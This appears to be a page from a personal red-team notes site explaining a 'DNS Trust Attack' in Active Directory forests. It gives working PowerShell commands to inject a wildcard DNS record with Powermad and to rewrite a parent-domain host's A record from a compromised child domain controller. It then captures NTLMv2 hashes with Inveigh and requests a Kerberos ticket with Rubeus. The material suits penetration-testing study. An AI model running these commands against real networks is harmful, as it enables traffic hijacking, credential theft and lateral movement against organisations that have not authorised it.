🦦
Otter's Notes
  • Introduction
  • Articles
    • Dumping data from the Microsoft Recall folder
    • Gaining persistence on Windows with Time Providers
    • Reverse engineering LSASS to decrypt DPAPI keys
    • Intro to Hypervisor Implants
    • In-depth Windows Telemetry
  • Notes
    • Active Directory
      • Active Directory Structure
      • Active Directory Terminology
      • Active Directory Objects
      • Active Directory Groups
      • Active Directory Functionality
      • Active Directory Protocols
      • Active Directory Rights and Privileges
      • Security in Active Directory
      • Users and Machine Accounts
      • NTLM
      • LDAP
      • Making a Target User List
      • Enumerating & Retrieving Password Policies
      • Enumerating Security Controls
      • Examining Group Policy
      • GPOs
      • LAPS
      • LLMNR & NBT-NS Poisoning
      • LOLBIN Enumeration
    • AAD
      • Useful Links
      • Overview of Azure & M365
      • Enumerate Users and Domains
      • Post-exploitation Reconnaissance
      • OAuth 2.0 Abuse
      • Abusing Device Code Authentication
      • Abusing Cloud Administrator Role
      • Abusing User Administrator Role
      • AAD Federated Backdoor
      • Service Principal Abuse
      • Compromising Azure Blobs and Storage Accounts
      • Malicious Device Join
      • Disabling Auditing (Unified Audit Logs)
      • Spoofing Azure Sign-In Logs
      • Registering Fake Agents for Log Spoofing
      • Pass the PRT
      • Pass the Cookie
      • Abusing Managed Identities
      • Virtual Machine Abuse
      • Attacking Key Vaults
    • Forest Trust Abuse
      • Parent-Child Trust Abuse
      • One-Way Inbound Trust Abuse
      • Foreign Group Membership
      • Foreign ACL Principals
      • SID History
      • SID Filter Bypass
      • Intra-Forest Attacks
        • Configuration Naming Context Replication
        • ADCS NC Replication Attack
        • GPO On-Site Attack
        • GoldenGMSA Attack
        • DNS Trust Attack
      • Cross-Forest Attacks
        • Trust Account Attack
        • Abusing SQL Linked Servers
        • Abusing PAM Trusts
    • Kerberos
      • Overview of Kerberos Authentication
      • Silver Tickets
      • Golden Tickets
      • Diamond Tickets
      • Kerberoasting
      • AS-REPRoasting
      • Resource-Based Constrained Delegation
      • Constrained Delegation
      • Unconstrained Delegation
      • S4U2Self & S4U2Proxy
      • Golden Certificates
    • DACL Abuse
      • DACL Overview
      • DACLs Enumeration
      • AddMembers
      • GPO Attacks
      • Granting Rights and Ownership
      • Logon Scripts
      • NoPAC
      • Password Abuse
      • SPN Jacking
      • Shadow Credentials
      • Targeted Kerberoasting
    • ADCS
      • Introduction to ADCS
      • ESC1
      • ESC2
      • ESC3
      • ESC4
      • ESC5
      • ESC6
      • ESC7
      • ESC8
      • ESC9
      • ESC10
      • ESC11
      • Certificate Mapping
    • PowerShell
      • PowerShell Basics
      • PowerShell Remoting
      • Alternate PowerShell Hosts
      • PowerShell Pipeline Runners
      • PowerShell Code Signing
      • Scriptblock Logging
      • PowerShell CLM
      • AMSI
      • PowerShell Reflection
      • WMI - Windows Management Instrumentation
      • Interfacing with AD
      • PowerShell Snippets
        • Bypass application whitelisting and CLM with runscripthelper and WMI
        • Create fake PowerShell logs
        • Enumerate AD ACLs
        • Enumerate WMI events
        • Enumerate Domain Trusts
        • Enumerate change metadata
        • Enumerate non-signed service binaries
        • Enumerate with GPOs
        • Find signed alternate PowerShell hosts
        • Get AMSI module
        • Group processes by user with WMI
        • Hide processes from Get-Process
        • Malware re-purposing with PowerShell reflection
        • Monitor PowerShell hosts with WMI
        • PowerShell reflection offensive use-case
        • Query PowerShell alternative hosts with WMI
        • Retrieve file certificate
        • Search LDAP for misconfigurations
        • Sign custom code with PowerShell
        • WMI service creation
        • Weak folder permission enumeration
    • AWS
      • AWS Organizations
      • AWS Principals
    • Binary Exploitation
      • Environment setup for Browser Exploitation
      • Browser Overview and Components
    • Kernel Development
      • Windows
        • Configuring a VM for driver development
Powered by GitBook
On this page
  1. Notes
  2. Forest Trust Abuse
  3. Intra-Forest Attacks

DNS Trust Attack

This attack abuses the unauthorized modification of DNS records within of the database locations of a parent domain from within a child domain. If we manage to pop a SYSTEM shell on the child DC we should be able to modify the DNS records for the parent domain as well, possibly leading to MITM attacks or traffic redirection.

This privilege is usually associated with EDCs (Enterprise Domain Controllers).

DNS records are stored in three distinct locations within the Active Directory:

  1. DomainDnsZones partition (CN=MicrosoftDNS,DC=DomainDnsZones,DC=root,DC=local)

  2. ForestDnsZones partition (CN=MicrosoftDNS,DC=ForestDnsZones,DC=root,DC=local)

  3. Domain partition (CN=MicrosoftDNS,CN=System,DC=root,DC=local)

DNS Wildcard Injection

With this technique we can create a "catch-all" record to make the DNS server handle non-existent subdomains.

For example, we can create a (DC=*, DC=domain.com, CN=MicrosoftDNS, DC=DomainDNSZones, DC=domain, DC=com) record and point it to a host we already own to redirect all the traffic caught by the DNS rule to us.

Import-module .\Powermad.ps1
New-ADIDNSNode -Node * -domainController DC01.domain.com -Domain domain.com -Zone domain.com -Tombstone -Verbose

The destination IP is not specified as it is set automatically when running the command. If we want to specify a different host to redirect the traffic to we can do so with the-Data <IP>option.

Arbitrary DNS Record Modification from Child Domain

Since established infrastructures are unlikely to make requests for non-existent it might be better to associate an already existing DNS record to an address within the child domain.

This can be extremely useful if LLMNR poisoning is a viable attack vector inside the forest.

With a shell as SYSTEM we can enumerate the DNS records in the parent domain

Get-DnsServerResourceRecord -ComputerName DC01.domain.com -ZoneName domain.com -Name "@"

<SNIP>

DEV01  A  1  0  01:00:00  <IP ADDRESS>

<SNIP>
Resolve-DnsName -Name DEV01.domain.com -Server DC01.DOMAIN.COM

DEV01.domain.com  A  599  Answer  <IP ADDRESS>

In this dummy output, we see that there is a DNS entry for the DEV01 host pointed to some ip.

From the same shell we can modify the DNS entry and redirect the traffic to another address of our choice and verify the change.

$Old = Get-DnsServerResourceRecord -ComputerName DC01.DOMAIN.COM -ZoneName domain.com -Name DEV01
$New = $Old.Clone()
$TTL = [System.TimeSpan]::FromSeconds(1)
$New.TimeToLive = $TTL
$New.RecordData.IPv4Address = [System.Net.IPAddress]::parse('<ANOTHER IP ADDRESS>')
Set-DnsServerResourceRecord -NewInputObject $New -OldInputObject $Old -ComputerName DC01.DOMAIN.COM -ZoneName domain.com 
Get-DnsServerResourceRecord -ComputerName DC01.domain.com -ZoneName domain.com -Name "@"


Resolve-DnsName -Name DEV01.domain.com -Server DC01.DOMAIN.COM

DEV01.domain.com  A  599  Answer  <ANOTHER IP ADDRESS>

At this point we're able to set up Responder or Inveigh and wait for a domain user to authenticate into us to catch the NTLMv2 hash and, with a bit of luck, crack it and request a ticket for the user.

Import-Module .\Inveigh.ps1
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y -SMB Y
.\Rubeus.exe asktgt /user:otter /domain:domain.com /password:SomethingSecure123! /ptt
PreviousGoldenGMSA AttackNextCross-Forest Attacks

Last updated 1 year ago